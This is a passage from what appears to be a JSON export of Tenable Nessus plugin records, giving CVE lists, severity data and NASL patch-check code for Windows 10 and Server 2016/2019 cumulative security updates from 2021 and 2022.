script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009585'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:'10240',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009585])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005031: Windows 10 Version 1909 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005031.NASL", "href": "https://www.tenable.com/plugins/nessus/152430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152430);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005031\");\n script_xref(name:\"MSFT\", value:\"MS21-5005031\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005031: Windows 10 Version 1909 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005031-os-build-18363-1734-8af726da-a39b-417d-a5fb-670c42d69e78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?819616f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005031.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005031'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:18363,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005031])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:07:27", "description": "The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005033.NASL", "href": "https://www.tenable.com/plugins/nessus/152431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26431\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005033\");\n script_xref(name:\"MSFT\", value:\"MS21-5005033\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431,\n CVE-2021-34483, CVE-2021-34484, CVE-2021-34486,\n CVE-2021-34487, CVE-2021-34536, CVE-2021-34537,\n CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005033-os-builds-19041-1165-19042-1165-and-19043-1165-b4c77d08-435a-4833-b9f7-e092372079a4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?526975a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-08';\nvar kbs = make_list(\n '5005033'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19041,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19042,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19043,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:50", "description": "The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005043.NASL", "href": "https://www.tenable.com/plugins/nessus/152434", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152434);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005043\");\n script_xref(name:\"MSFT\", value:\"MS21-5005043\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34487, CVE-2021-34536,\n CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005043-os-build-14393-4583-709d481e-b02a-4eb9-80d9-75c4b8170240\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e5193663\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005043.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005043'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:14393,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005043])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005030.NASL", "href": "https://www.tenable.com/plugins/nessus/152435", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152435);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005030\");\n script_xref(name:\"MSFT\", value:\"MS21-5005030\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n 